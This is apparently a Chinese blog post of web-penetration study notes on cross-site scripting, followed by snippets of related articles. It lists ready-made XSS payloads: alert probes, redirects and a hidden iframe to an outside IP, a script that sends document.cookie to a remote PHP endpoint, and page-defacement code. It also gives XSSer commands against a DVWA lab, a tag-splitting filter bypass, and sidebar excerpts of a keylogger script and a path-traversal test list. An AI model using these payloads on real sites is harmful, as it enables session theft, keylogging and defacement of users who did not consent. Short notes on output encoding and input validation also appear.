xss漏洞

最新推荐文章于 2024-04-01 21:04:27 发布
最新推荐文章于 2024-04-01 21:04:27 发布
阅读量322 收藏 1
点赞数 1
分类专栏: web渗透笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kali3426/article/details/79801816
版权

提交的内容被服务器原封不动的返回,则可能出现漏洞。

Xss漏洞分为存储型、反射型、DOM型

反射型:

检测代码:

<script> alert(‘XSS’); </script>    弹出一个警告窗口

<a href='' οnclick=alert('xss')>type</a>        建立一个点击,点击后弹出警告窗口
<img src=http://1.1.1.1/a.ipg οnerrοr=alert('xss')>       创造一个错误,错误后执行警告窗口

漏洞利用代码:

 <script>window.location=‘http://1.1.1.1'</script> 

 <iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe> 

重定向到另一个网址或ip

<script>new Image().src="http://1.1.1.1/c.php? output="+document.cookie;</script>   盗取cookie

 <script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS WEBSITE IS UNDER ATTACK</h1></div>";</script>       篡改页面




可以在本机写好js,直接让受害者利用url调用本机的js代码



利用xss反射型漏洞编写一个键盘记录器:







攻击后,在页面上的键盘操作都会被记录到keylog.txt中



Xsser笔记:

xsser -u“http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name="-cookie="security=low;PHPSESSID=d23e469411707ff8210717e67c521a81" -s-v  --reverse-check

检查是否有xss漏洞,出现代表注入成功

--heuristic 检查被过滤的字符


xsser -u"http://1.1.1.1/dvwa/vulnerabilities/" -g "xss_r/?name="-cookie="security=high;PHPSESSID=d23e469411707ff8210717e67c521a81" --Cem='Mix,Une,Str,Hex'

若输入对<script>过滤,则可以使用<scr<script>ipt>绕过

htmlspecialchars()此方法可以过滤 <>,对<>进行html编码



存储型:

特点:1.长期存储在服务器上
          2.每次用户访问都会执行js脚本


若浏览器html代码对输入表单长度进行限制,则可以用以下方法:

打开开发者工具,点击html再点击表单位置,然后修改参数





DOM型:

利用dom方法盗取cookie

a_16
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali安装keylogger_小白日记48:kali渗透测试之Web渗透-XSS(二)-漏洞利用-键盘记录器,xsser...
weixin_29344293的博客
12-24 606
XSS原则上:只要XSS漏洞存在,可以编写任何功能的js脚本【反射型漏洞利用】键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上服务器:kali    客户端启动apache2服务:service apache2 start语法:keylogger.js1 document.onkeypress = function(evt) {2 evt = evt || window.event3 k...
XSS漏洞防御
2301_80361487的博客
01-24 435
• 黑名单验证:对包含XSS代码特征的内容进行过滤,如“”、”script”、”#”• 白名单验证:对用户提交的数据进行检查,只接受指定长度范围内、采用适当格式和预期。禁止未授权的脚本执行(新特性,Google Map 移动版在使用)。禁止内联脚本执行(规则较严格,目前发现 GitHub 使用)。禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。4)可以采用白名单验证或者黑名单验证方法。禁止加载外域代码,防止复杂的攻击逻辑。• 对所有输出字符进行HTML编码。字符的输入,其余一律过滤。
常见的Web漏洞——XSS
江左盟的博客
07-08 2万+
目录 XSS简介 XSS原理及分类 反射型XSS 存储型XSS 基于DOMXSS XSSer的使用 至少有一个的参数: 可选的参数: 检查选项 选择攻击向量 绕过防火墙选项 绕过器选项 特殊技术 最后注入选项 特殊最后注入选项 报告导出 XSSer演示 BeEF-XSS 漏洞的防范 总结 XSS简介 XSS是跨站脚本攻击(Cross Site Scri...
XSS漏洞
qq_51459600的博客
03-21 4196
Cross Site Scripting 反射型(不持久型)(中危) 一次性,不会存储在数据库里 <?php $name = $_GET['name']; echo "Welcome $name<br>"; ?> 存储型(高危) 存储在数据库中,每次打开都会执行代码 DOM XSS 不与后台服务器产生数据交互,通过前端的dom(Document Object Model)节点形成的XSS漏洞。 ' onclick="alert(123)"> 常用测试语句 &
CTF-攻防世界-Reverse-(simple-check-100)
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-07 1289
simple-check-100 分析文件 下载附件解压之后发现有三个文件夹前面两个是elf文件(linux),还有一个exe文件(windows) 不太明白 为什么要给两个,先不管了 先来在windows下分析一下.exe文件 使用IDA静态分析 定位到主函数 main 大概流程是这样的将用户输入的key值,使用check_key()函数检查之后如果为真就执行下面的函数 猜测这个函数应该就是输出flag的 很显然 我们只需要在程序执行完check...
二、XSS漏洞
weixin_33739627的博客
12-19 109
xss: 全称cross-site scripting,是用于攻击Web客户端而不是服务器端,其最大的特点是能把恶意的JS或HTML代码注入到用户浏览的网页上。而XSS漏洞的存在,主要是由于Web应用程序对用户的输入没有进行严格的过滤所导致的,当攻击者把恶意代码注入到网页时,用户只要访问该网页就会执行其中的恶意代码。 反射型xss(非持久): 反射型xss一般是指自定义内容发送的服务器,服务...
XSS漏洞详解
热门推荐
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
XSS漏洞利用
最新发布
2302_79885863的博客
04-01 2231
输出编码主要有URL、HTML、JS可以采用白名单验证或者黑名单验证方法。白名单验证:对用户提交的数据进行格查,只接受指定长度范围内、采用适当格式和预期字符的输入,其余一律过滤黑名单验证:对包含XSS代码特征的内容进行过滤,如"“、“script”、”#"等·对所有输出字符进行HTML编码‘’ 转成& gt;‘&’ 转成& amp;" 转成& quot;’ 转成& #39;
JSP使用过滤器防止Xss漏洞
10-17
在Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
百度编辑器解决xss漏洞
03-01
百度编辑器解决xss漏洞
nikto使用方法笔记
f1gure的博客
12-24 1万+
nikto -update 升级数据库和插件 nikto -host 192.168.1.109 -port 80 指定host和端口号扫描 nikto -host www.baidu.com -port 443 -ssl 扫描https网站 nikto -host hosts.txt 扫描文本文件里的网站 nmap -p80 192.168.1.0/24 -oG - | nikto -h
vega使用方法笔记
f1gure的博客
12-25 5579
vega重点关注web application方面的代码漏洞,比如sql注入、跨站等 sudo dhclient eth0  给metaspolitable重新获取ip地址   proxy模式:手工扒站  scanner模式:自动扒站   使用上面的useragent 阻止浏览器缓存内容:增加流量,提高漏洞发现可能性 记录所有请求;显示详细扫描信息 编辑扫描模块
web目标遍历和文件包含漏洞
f1gure的博客
03-08 2096
配置靶机:     → 重启apache服务:经典测试方法:•?file=../../../../etc/passwd •?page=file:///etc/passwd •?home=main.cgi  •?page=http://www.a.com/1.php •http://1.1.1.1/../../../../dir/file.txt 绕过过滤检测方法部分服务器防御机制:在路径后面添加....
web身份认证漏洞
f1gure的博客
03-05 1675
Session ID的利用:截取目标session ID利用firefox浏览器的tools &gt; cookies manager功能导入IE获取session ID方法:F12开发人员工具&gt;缓存 找回密码理想实验:https://www.example.com/reset?email=user@example.com&amp;key=b4c9a289323b21a01c3e940f15...
XSS漏洞利用深度解析
这篇资料主要探讨了XSS漏洞的利用和挖掘,适合初学者入门学习。 首先,攻击者可能将XSS攻击代码嵌入到网页中,当用户访问这个被注入的页面时,恶意脚本会在用户的浏览器上下文中执行。例如,`alert(1)`或`alert...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值